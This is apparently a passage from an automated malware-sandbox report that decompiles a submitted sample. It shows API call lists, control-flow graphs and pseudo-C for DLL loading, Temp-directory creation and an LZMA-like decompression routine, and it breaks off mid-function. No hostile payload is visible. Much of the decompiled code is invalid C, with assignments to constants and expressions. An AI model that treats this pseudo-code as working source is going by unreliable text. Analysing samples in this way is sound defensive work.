                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                            • wsprintfW.USER32 ref: 00406A17
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                            C-Code - Quality: 100%
                            			E00405B99(WCHAR* _a4) {
                            				struct _SECURITY_ATTRIBUTES _v16;
                            				struct _SECURITY_DESCRIPTOR _v36;
                            				int _t22;
                            				long _t23;
                            
                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                            				_v36.Owner = 0x4083f8;
                            				_v36.Group = 0x4083f8;
                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                            				_v16.lpSecurityDescriptor =  &_v36;
                            				_v36.Revision = 1;
                            				_v36.Control = 4;
                            				_v36.Dacl = 0x4083e8;
                            				_v16.nLength = 0xc;
                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                            				if(_t22 != 0) {
                            					L1:
                            					return 0;
                            				}
                            				_t23 = GetLastError();
                            				if(_t23 == 0xb7) {
                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                            						goto L1;
                            					}
                            					return GetLastError();
                            				}
                            				return _t23;
                            			}








                            APIs
                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                            • GetLastError.KERNEL32 ref: 00405BF0
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                            • GetLastError.KERNEL32 ref: 00405C0F
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3449924974-823278215
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 538 406bb0-406bd3 539 406bd5-406bd8 538->539 540 406bdd-406be0 538->540 541 4075fd-407601 539->541 542 406be3-406bec 540->542 543 406bf2 542->543 544 4075fa 542->544 545 406bf9-406bfd 543->545 546 406d39-4073e0 543->546 547 406c9e-406ca2 543->547 548 406d0e-406d12 543->548 544->541 549 406c03-406c10 545->549 550 4075e5-4075f8 545->550 556 4073e2-4073f8 546->556 557 4073fa-407410 546->557 554 406ca8-406cc1 547->554 555 40754e-407558 547->555 551 406d18-406d2c 548->551 552 40755d-407567 548->552 549->544 558 406c16-406c5c 549->558 550->541 559 406d2f-406d37 551->559 552->550 560 406cc4-406cc8 554->560 555->550 561 407413-40741a 556->561 557->561 562 406c84-406c86 558->562 563 406c5e-406c62 558->563 559->546 559->548 560->547 564 406cca-406cd0 560->564 567 407441-40744d 561->567 568 40741c-407420 561->568 571 406c94-406c9c 562->571 572 406c88-406c92 562->572 569 406c64-406c67 GlobalFree 563->569 570 406c6d-406c7b GlobalAlloc 563->570 565 406cd2-406cd9 564->565 566 406cfa-406d0c 564->566 573 406ce4-406cf4 GlobalAlloc 565->573 574 406cdb-406cde GlobalFree 565->574 566->559 567->542 575 407426-40743e 568->575 576 4075cf-4075d9 568->576 569->570 570->544 578 406c81 570->578 571->560 572->571 572->572 573->544 573->566 574->573 575->567 576->550 578->562
                            C-Code - Quality: 98%
                            			E00406BB0(void* __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				signed int _v16;
                            				unsigned int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _v84;
                            				signed int _v88;
                            				signed int _v92;
                            				signed int _v95;
                            				signed int _v96;
                            				signed int _v100;
                            				signed int _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				signed int _v116;
                            				signed int _v120;
                            				intOrPtr _v124;
                            				signed int _v128;
                            				signed int _v132;
                            				signed int _v136;
                            				void _v140;
                            				void* _v148;
                            				signed int _t537;
                            				signed int _t538;
                            				signed int _t572;
                            
                            				_t572 = 0x22;
                            				_v148 = __ecx;
                            				memcpy( &_v140, __ecx, _t572 << 2);
                            				if(_v52 == 0xffffffff) {
                            					return 1;
                            				}
                            				while(1) {
                            					L3:
                            					_t537 = _v140;
                            					if(_t537 > 0x1c) {
                            						break;
                            					}
                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                            						case 0:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								goto L173;
                            							}
                            							_v112 = _v112 - 1;
                            							_v116 = _v116 + 1;
                            							_t537 =  *_v116;
                            							__eflags = _t537 - 0xe1;
                            							if(_t537 > 0xe1) {
                            								goto L174;
                            							}
                            							_t542 = _t537 & 0x000000ff;
                            							_push(0x2d);
                            							asm("cdq");
                            							_pop(_t576);
                            							_push(9);
                            							_pop(_t577);
                            							_t622 = _t542 / _t576;
                            							_t544 = _t542 % _t576 & 0x000000ff;
                            							asm("cdq");
                            							_t617 = _t544 % _t577 & 0x000000ff;
                            							_v64 = _t617;
                            							_v32 = (1 << _t622) - 1;
                            							_v28 = (1 << _t544 / _t577) - 1;
                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                            							__eflags = 0x600 - _v124;
                            							if(0x600 == _v124) {
                            								L12:
                            								__eflags = _t625;
                            								if(_t625 == 0) {
                            									L14:
                            									_v76 = _v76 & 0x00000000;
                            									_v68 = _v68 & 0x00000000;
                            									goto L17;
                            								} else {
                            									goto L13;
                            								}
                            								do {
                            									L13:
                            									_t625 = _t625 - 1;
                            									__eflags = _t625;
                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                            								} while (_t625 != 0);
                            								goto L14;
                            							}
                            							__eflags = _v8;
                            							if(_v8 != 0) {
                            								GlobalFree(_v8);
                            							}
                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                            							__eflags = _t537;
                            							_v8 = _t537;
                            							if(_t537 == 0) {
                            								goto L174;
                            							} else {
                            								_v124 = 0x600;
                            								goto L12;
                            							}
                            						case 1:
                            							L15:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 1;
                            								goto L173;
                            							}
                            							_v112 = _v112 - 1;
                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                            							_v116 = _v116 + 1;
                            							_t50 =  &_v76;
                            							 *_t50 = _v76 + 1;
                            							__eflags =  *_t50;
                            							L17:
                            							__eflags = _v76 - 4;
                            							if(_v76 < 4) {
                            								goto L15;
                            							}
                            							_t550 = _v68;
                            							__eflags = _t550 - _v120;
                            							if(_t550 == _v120) {
                            								L22:
                            								_v76 = 5;
                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                            								goto L25;
                            							}
                            							__eflags = _v12;
                            							_v120 = _t550;
                            							if(_v12 != 0) {
                            								GlobalFree(_v12);
                            							}
                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                            							__eflags = _t537;
                            							_v12 = _t537;
                            							if(_t537 == 0) {
                            								goto L174;
                            							} else {
                            								goto L22;
                            							}
                            						case 2:
                            							L26:
                            							_t557 = _v100 & _v32;
                            							_v136 = 6;
                            							_v80 = _t557;
                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                            							goto L135;
                            						case 3:
                            							L23:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 3;
                            								goto L173;
                            							}
                            							_v112 = _v112 - 1;
                            							_t72 =  &_v116;
                            							 *_t72 = _v116 + 1;
                            							__eflags =  *_t72;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							L25:
                            							_v76 = _v76 - 1;
                            							__eflags = _v76;
                            							if(_v76 != 0) {
                            								goto L23;
                            							}
                            							goto L26;
                            						case 4:
                            							L136:
                            							_t559 =  *_t626;
                            							_t610 = _t559 & 0x0000ffff;
                            							_t591 = (_v20 >> 0xb) * _t610;
                            							__eflags = _v16 - _t591;
                            							if(_v16 >= _t591) {
                            								_v20 = _v20 - _t591;
                            								_v16 = _v16 - _t591;
                            								_v68 = 1;
                            								_t560 = _t559 - (_t559 >> 5);
                            								__eflags = _t560;
                            								 *_t626 = _t560;
                            							} else {
                            								_v20 = _t591;
                            								_v68 = _v68 & 0x00000000;
                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                            							}
                            							__eflags = _v20 - 0x1000000;
                            							if(_v20 >= 0x1000000) {
                            								goto L142;
                            							} else {
                            								goto L140;
                            							}
                            						case 5:
                            							L140:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 5;
                            								goto L173;
                            							}
                            							_v20 = _v20 << 8;
                            							_v112 = _v112 - 1;
                            							_t464 =  &_v116;
                            							 *_t464 = _v116 + 1;
                            							__eflags =  *_t464;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							L142:
                            							_t561 = _v136;
                            							goto L143;
                            						case 6:
                            							__edx = 0;
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								__eax = _v8;
                            								__ecx = _v60;
                            								_v56 = 1;
                            								_v136 = 7;
                            								__esi = _v8 + 0x180 + _v60 * 2;
                            								goto L135;
                            							}
                            							__eax = _v96 & 0x000000ff;
                            							__esi = _v100;
                            							__cl = 8;
                            							__cl = 8 - _v64;
                            							__esi = _v100 & _v28;
                            							__eax = (_v96 & 0x000000ff) >> 8;
                            							__ecx = _v64;
                            							__esi = (_v100 & _v28) << 8;
                            							__ecx = _v8;
                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                            							__eflags = _v60 - 4;
                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                            							if(_v60 >= 4) {
                            								__eflags = _v60 - 0xa;
                            								if(_v60 >= 0xa) {
                            									_t103 =  &_v60;
                            									 *_t103 = _v60 - 6;
                            									__eflags =  *_t103;
                            								} else {
                            									_v60 = _v60 - 3;
                            								}
                            							} else {
                            								_v60 = 0;
                            							}
                            							__eflags = _v56 - __edx;
                            							if(_v56 == __edx) {
                            								__ebx = 0;
                            								__ebx = 1;
                            								goto L63;
                            							}
                            							__eax = _v24;
                            							__eax = _v24 - _v48;
                            							__eflags = __eax - _v120;
                            							if(__eax >= _v120) {
                            								__eax = __eax + _v120;
                            								__eflags = __eax;
                            							}
                            							__ecx = _v12;
                            							__ebx = 0;
                            							__ebx = 1;
                            							__al =  *((intOrPtr*)(__eax + __ecx));
                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                            							goto L43;
                            						case 7:
                            							__eflags = _v68 - 1;
                            							if(_v68 != 1) {
                            								__eax = _v40;
                            								_v132 = 0x16;
                            								_v36 = _v40;
                            								__eax = _v44;
                            								_v40 = _v44;
                            								__eax = _v48;
                            								_v44 = _v48;
                            								__eax = 0;
                            								__eflags = _v60 - 7;
                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            								__al = __al & 0x000000fd;
                            								__eax = (__eflags >= 0) - 1 + 0xa;
                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                            								__eax = _v8;
                            								__eax = _v8 + 0x664;
                            								__eflags = __eax;
                            								_v92 = __eax;
                            								goto L71;
                            							}
                            							__eax = _v8;
                            							__ecx = _v60;
                            							_v136 = 8;
                            							__esi = _v8 + 0x198 + _v60 * 2;
                            							goto L135;
                            						case 8:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								__eax = _v8;
                            								__ecx = _v60;
                            								_v136 = 0xa;
                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                            							} else {
                            								__eax = _v60;
                            								__ecx = _v8;
                            								__eax = _v60 + 0xf;
                            								_v136 = 9;
                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                            							}
                            							goto L135;
                            						case 9:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								goto L92;
                            							}
                            							__eflags = _v100;
                            							if(_v100 == 0) {
                            								goto L174;
                            							}
                            							__eax = 0;
                            							__eflags = _v60 - 7;
                            							_t264 = _v60 - 7 >= 0;
                            							__eflags = _t264;
                            							0 | _t264 = _t264 + _t264 + 9;
                            							_v60 = _t264 + _t264 + 9;
                            							goto L78;
                            						case 0xa:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								__eax = _v8;
                            								__ecx = _v60;
                            								_v136 = 0xb;
                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                            								goto L135;
                            							}
                            							__eax = _v44;
                            							goto L91;
                            						case 0xb:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								__ecx = _v40;
                            								__eax = _v36;
                            								_v36 = _v40;
                            							} else {
                            								__eax = _v40;
                            							}
                            							__ecx = _v44;
                            							_v40 = _v44;
                            							L91:
                            							__ecx = _v48;
                            							_v48 = __eax;
                            							_v44 = _v48;
                            							L92:
                            							__eax = _v8;
                            							_v132 = 0x15;
                            							__eax = _v8 + 0xa68;
                            							_v92 = _v8 + 0xa68;
                            							goto L71;
                            						case 0xc:
                            							L102:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0xc;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t340 =  &_v116;
                            							 *_t340 = _v116 + 1;
                            							__eflags =  *_t340;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							__eax = _v48;
                            							goto L104;
                            						case 0xd:
                            							L39:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0xd;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t127 =  &_v116;
                            							 *_t127 = _v116 + 1;
                            							__eflags =  *_t127;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							L41:
                            							__eax = _v68;
                            							__eflags = _v76 - _v68;
                            							if(_v76 != _v68) {
                            								goto L50;
                            							}
                            							__eflags = __ebx - 0x100;
                            							if(__ebx >= 0x100) {
                            								goto L56;
                            							}
                            							L43:
                            							__eax = _v95 & 0x000000ff;
                            							_v95 = _v95 << 1;
                            							__ecx = _v92;
                            							__eax = (_v95 & 0x000000ff) >> 7;
                            							_v76 = __eax;
                            							__eax = __eax + 1;
                            							__eax = __eax << 8;
                            							__eax = __eax + __ebx;
                            							__esi = _v92 + __eax * 2;
                            							_v20 = _v20 >> 0xb;
                            							__ax =  *__esi;
                            							_v88 = __esi;
                            							__edx = __ax & 0x0000ffff;
                            							__ecx = (_v20 >> 0xb) * __edx;
                            							__eflags = _v16 - __ecx;
                            							if(_v16 >= __ecx) {
                            								_v20 = _v20 - __ecx;
                            								_v16 = _v16 - __ecx;
                            								__cx = __ax;
                            								_v68 = 1;
                            								__cx = __ax >> 5;
                            								__eflags = __eax;
                            								__ebx = __ebx + __ebx + 1;
                            								 *__esi = __ax;
                            							} else {
                            								_v68 = _v68 & 0x00000000;
                            								_v20 = __ecx;
                            								0x800 = 0x800 - __edx;
                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							__eflags = _v20 - 0x1000000;
                            							_v72 = __ebx;
                            							if(_v20 >= 0x1000000) {
                            								goto L41;
                            							} else {
                            								goto L39;
                            							}
                            						case 0xe:
                            							L48:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0xe;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t161 =  &_v116;
                            							 *_t161 = _v116 + 1;
                            							__eflags =  *_t161;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							while(1) {
                            								L50:
                            								__eflags = __ebx - 0x100;
                            								if(__ebx >= 0x100) {
                            									break;
                            								}
                            								__eax = _v92;
                            								__edx = __ebx + __ebx;
                            								__ecx = _v20;
                            								__esi = __edx + __eax;
                            								__ecx = _v20 >> 0xb;
                            								__ax =  *__esi;
                            								_v88 = __esi;
                            								__edi = __ax & 0x0000ffff;
                            								__ecx = (_v20 >> 0xb) * __edi;
                            								__eflags = _v16 - __ecx;
                            								if(_v16 >= __ecx) {
                            									_v20 = _v20 - __ecx;
                            									_v16 = _v16 - __ecx;
                            									__cx = __ax;
                            									_t175 = __edx + 1; // 0x1
                            									__ebx = _t175;
                            									__cx = __ax >> 5;
                            									__eflags = __eax;
                            									 *__esi = __ax;
                            								} else {
                            									_v20 = __ecx;
                            									0x800 = 0x800 - __edi;
                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            									__ebx = __ebx + __ebx;
                            									 *__esi = __cx;
                            								}
                            								__eflags = _v20 - 0x1000000;
                            								_v72 = __ebx;
                            								if(_v20 >= 0x1000000) {
                            									continue;
                            								} else {
                            									goto L48;
                            								}
                            							}
                            							L56:
                            							_t178 =  &_v56;
                            							 *_t178 = _v56 & 0x00000000;
                            							__eflags =  *_t178;
                            							goto L57;
                            						case 0xf:
                            							L60:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0xf;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t208 =  &_v116;
                            							 *_t208 = _v116 + 1;
                            							__eflags =  *_t208;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							L62:
                            							__eflags = __ebx - 0x100;
                            							if(__ebx >= 0x100) {
                            								L57:
                            								__al = _v72;
                            								_v96 = _v72;
                            								goto L58;
                            							}
                            							L63:
                            							__eax = _v92;
                            							__edx = __ebx + __ebx;
                            							__ecx = _v20;
                            							__esi = __edx + __eax;
                            							__ecx = _v20 >> 0xb;
                            							__ax =  *__esi;
                            							_v88 = __esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = (_v20 >> 0xb) * __edi;
                            							__eflags = _v16 - __ecx;
                            							if(_v16 >= __ecx) {
                            								_v20 = _v20 - __ecx;
                            								_v16 = _v16 - __ecx;
                            								__cx = __ax;
                            								_t222 = __edx + 1; // 0x1
                            								__ebx = _t222;
                            								__cx = __ax >> 5;
                            								__eflags = __eax;
                            								 *__esi = __ax;
                            							} else {
                            								_v20 = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							__eflags = _v20 - 0x1000000;
                            							_v72 = __ebx;
                            							if(_v20 >= 0x1000000) {
                            								goto L62;
                            							} else {
                            								goto L60;
                            							}
                            						case 0x10:
                            							L112:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0x10;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t371 =  &_v116;
                            							 *_t371 = _v116 + 1;
                            							__eflags =  *_t371;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							goto L114;
                            						case 0x11:
                            							L71:
                            							__esi = _v92;
                            							_v136 = 0x12;
                            							goto L135;
                            						case 0x12:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								__eax = _v92;
                            								_v136 = 0x13;
                            								__esi = _v92 + 2;
                            								L135:
                            								_v88 = _t626;
                            								goto L136;
                            							}
                            							__eax = _v80;
                            							_v52 = _v52 & 0x00000000;
                            							__ecx = _v92;
                            							__eax = _v80 << 4;
                            							__eflags = __eax;
                            							__eax = _v92 + __eax + 4;
                            							goto L133;
                            						case 0x13:
                            							__eflags = _v68;
                            							if(_v68 != 0) {
                            								_t475 =  &_v92;
                            								 *_t475 = _v92 + 0x204;
                            								__eflags =  *_t475;
                            								_v52 = 0x10;
                            								_v68 = 8;
                            								L147:
                            								_v128 = 0x14;
                            								goto L148;
                            							}
                            							__eax = _v80;
                            							__ecx = _v92;
                            							__eax = _v80 << 4;
                            							_v52 = 8;
                            							__eax = _v92 + (_v80 << 4) + 0x104;
                            							L133:
                            							_v92 = __eax;
                            							_v68 = 3;
                            							goto L147;
                            						case 0x14:
                            							_v52 = _v52 + __ebx;
                            							__eax = _v132;
                            							goto L143;
                            						case 0x15:
                            							__eax = 0;
                            							__eflags = _v60 - 7;
                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            							__al = __al & 0x000000fd;
                            							__eax = (__eflags >= 0) - 1 + 0xb;
                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                            							goto L123;
                            						case 0x16:
                            							__eax = _v52;
                            							__eflags = __eax - 4;
                            							if(__eax >= 4) {
                            								_push(3);
                            								_pop(__eax);
                            							}
                            							__ecx = _v8;
                            							_v68 = 6;
                            							__eax = __eax << 7;
                            							_v128 = 0x19;
                            							_v92 = __eax;
                            							goto L148;
                            						case 0x17:
                            							L148:
                            							__eax = _v68;
                            							_v84 = 1;
                            							_v76 = _v68;
                            							goto L152;
                            						case 0x18:
                            							L149:
                            							__eflags = _v112;
                            							if(_v112 == 0) {
                            								_v140 = 0x18;
                            								goto L173;
                            							}
                            							__ecx = _v116;
                            							__eax = _v16;
                            							_v20 = _v20 << 8;
                            							__ecx =  *_v116 & 0x000000ff;
                            							_v112 = _v112 - 1;
                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							_t490 =  &_v116;
                            							 *_t490 = _v116 + 1;
                            							__eflags =  *_t490;
                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                            							L151:
                            							_t493 =  &_v76;
                            							 *_t493 = _v76 - 1;
                            							__eflags =  *_t493;
                            							L152:
                            							__eflags = _v76;
                            							if(_v76 <= 0) {
                            								__ecx = _v68;
                            								__ebx = _v84;
                            								0 = 1;
                            								__eax = 1 << __cl;
                            								__ebx = _v84 - (1 << __cl);
                            								__eax = _v128;
                            								_v72 = __ebx;
                            								L143:
                            								_v140 = _t561;
                            								goto L3;
                            							}
                            							__eax = _v84;
                            							_v20 = _v20 >> 0xb;
                            							__edx = _v84 + _v84;
                            							__eax = _v92;
                            							__esi = __edx + __eax;
                            							_v88 = __esi;
                            							__ax =  *__esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = (_v20 >> 0xb) * __edi;
                            							__eflags = _v16 - __ecx;
                            							if(_v16 >= __ecx) {
                            								_v20 = _v20 - __ecx;
                            								_v16 = _v16 - __ecx;
                            								__cx = __ax;
                            								__cx = __ax >> 5;
                            								__eax = __eax - __ecx;
                            								__edx = __edx + 1;
                            								__eflags = __edx;
                            								 *__esi = __ax;
                            								_v84 = __edx;
                            							} else {
                            								_v20 = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								_v84 = _v84 << 1;
                            								 *__esi = __cx;
                            							}
                            							__eflags = _v20 - 0x1000000;
                            							if(_v20 >= 0x1000000) {
                            								goto L151;
                            							} else {
                            								goto L149;
                            							}
                            						case 0x19:
                            							__eflags = __ebx - 4;
                            							if(__ebx < 4) {
                            								_v48 = __ebx;
                            								L122:
                            								_t399 =  &_v48;
                            								 *_t399 = _v48 + 1;
                            								__eflags =  *_t399;
                            								L123:
                            								__eax = _v48;
                            								__eflags = __eax;
                            								if(__eax == 0) {
                            									_v52 = _v52 | 0xffffffff;
                            									goto L173;
                            								}
                            								__eflags = __eax - _v100;
                            								if(__eax > _v100) {
                            									goto L174;
                            								}
                            								_v52 = _v52 + 2;
                            								__eax = _v52;
                            								_t406 =  &_v100;
                            								 *_t406 = _v100 + _v52;
                            								__eflags =  *_t406;
                            								goto L126;
                            							}
                            							__ecx = __ebx;
                            							__eax = __ebx;
                            							__ecx = __ebx >> 1;
                            							__eax = __ebx & 0x00000001;
                            							__ecx = (__ebx >> 1) - 1;
                            							__al = __al | 0x00000002;
                            							__eax = (__ebx & 0x00000001) << __cl;
                            							__eflags = __ebx - 0xe;
                            							_v48 = __eax;
                            							if(__ebx >= 0xe) {
                            								__ebx = 0;
                            								_v76 = __ecx;
                            								L105:
                            								__eflags = _v76;
                            								if(_v76 <= 0) {
                            									__eax = __eax + __ebx;
                            									_v68 = 4;
                            									_v48 = __eax;
                            									__eax = _v8;
                            									__eax = _v8 + 0x644;
                            									__eflags = __eax;
                            									L111:
                            									__ebx = 0;
                            									_v92 = __eax;
                            									_v84 = 1;
                            									_v72 = 0;
                            									_v76 = 0;
                            									L115:
                            									__eax = _v68;
                            									__eflags = _v76 - _v68;
                            									if(_v76 >= _v68) {
                            										_t397 =  &_v48;
                            										 *_t397 = _v48 + __ebx;
                            										__eflags =  *_t397;
                            										goto L122;
                            									}
                            									__eax = _v84;
                            									_v20 = _v20 >> 0xb;
                            									__edi = _v84 + _v84;
                            									__eax = _v92;
                            									__esi = __edi + __eax;
                            									_v88 = __esi;
                            									__ax =  *__esi;
                            									__ecx = __ax & 0x0000ffff;
                            									__edx = (_v20 >> 0xb) * __ecx;
                            									__eflags = _v16 - __edx;
                            									if(_v16 >= __edx) {
                            										__ecx = 0;
                            										_v20 = _v20 - __edx;
                            										__ecx = 1;
                            										_v16 = _v16 - __edx;
                            										__ebx = 1;
                            										__ecx = _v76;
                            										__ebx = 1 << __cl;
                            										__ecx = 1 << __cl;
                            										__ebx = _v72;
                            										__ebx = _v72 | __ecx;
                            										__cx = __ax;
                            										__cx = __ax >> 5;
                            										__eax = __eax - __ecx;
                            										__edi = __edi + 1;
                            										__eflags = __edi;
                            										_v72 = __ebx;
                            										 *__esi = __ax;
                            										_v84 = __edi;
                            									} else {
                            										_v20 = __edx;
                            										0x800 = 0x800 - __ecx;
                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            										_v84 = _v84 << 1;
                            										 *__esi = __dx;
                            									}
                            									__eflags = _v20 - 0x1000000;
                            									if(_v20 >= 0x1000000) {
                            										L114:
                            										_t374 =  &_v76;
                            										 *_t374 = _v76 + 1;
                            										__eflags =  *_t374;
                            										goto L115;
                            									} else {
                            										goto L112;
                            									}
                            								}
                            								__ecx = _v16;
                            								__ebx = __ebx + __ebx;
                            								_v20 = _v20 >> 1;
                            								__eflags = _v16 - _v20;
                            								_v72 = __ebx;
                            								if(_v16 >= _v20) {
                            									__ecx = _v20;
                            									_v16 = _v16 - _v20;
                            									__ebx = __ebx | 0x00000001;
                            									__eflags = __ebx;
                            									_v72 = __ebx;
                            								}
                            								__eflags = _v20 - 0x1000000;
                            								if(_v20 >= 0x1000000) {
                            									L104:
                            									_t344 =  &_v76;
                            									 *_t344 = _v76 - 1;
                            									__eflags =  *_t344;
                            									goto L105;
                            								} else {
                            									goto L102;
                            								}
                            							}
                            							__edx = _v8;
                            							__eax = __eax - __ebx;
                            							_v68 = __ecx;
                            							__eax = _v8 + 0x55e + __eax * 2;
                            							goto L111;
                            						case 0x1a:
                            							L58:
                            							__eflags = _v104;
                            							if(_v104 == 0) {
                            								_v140 = 0x1a;
                            								goto L173;
                            							}
                            							__ecx = _v108;
                            							__al = _v96;
                            							__edx = _v12;
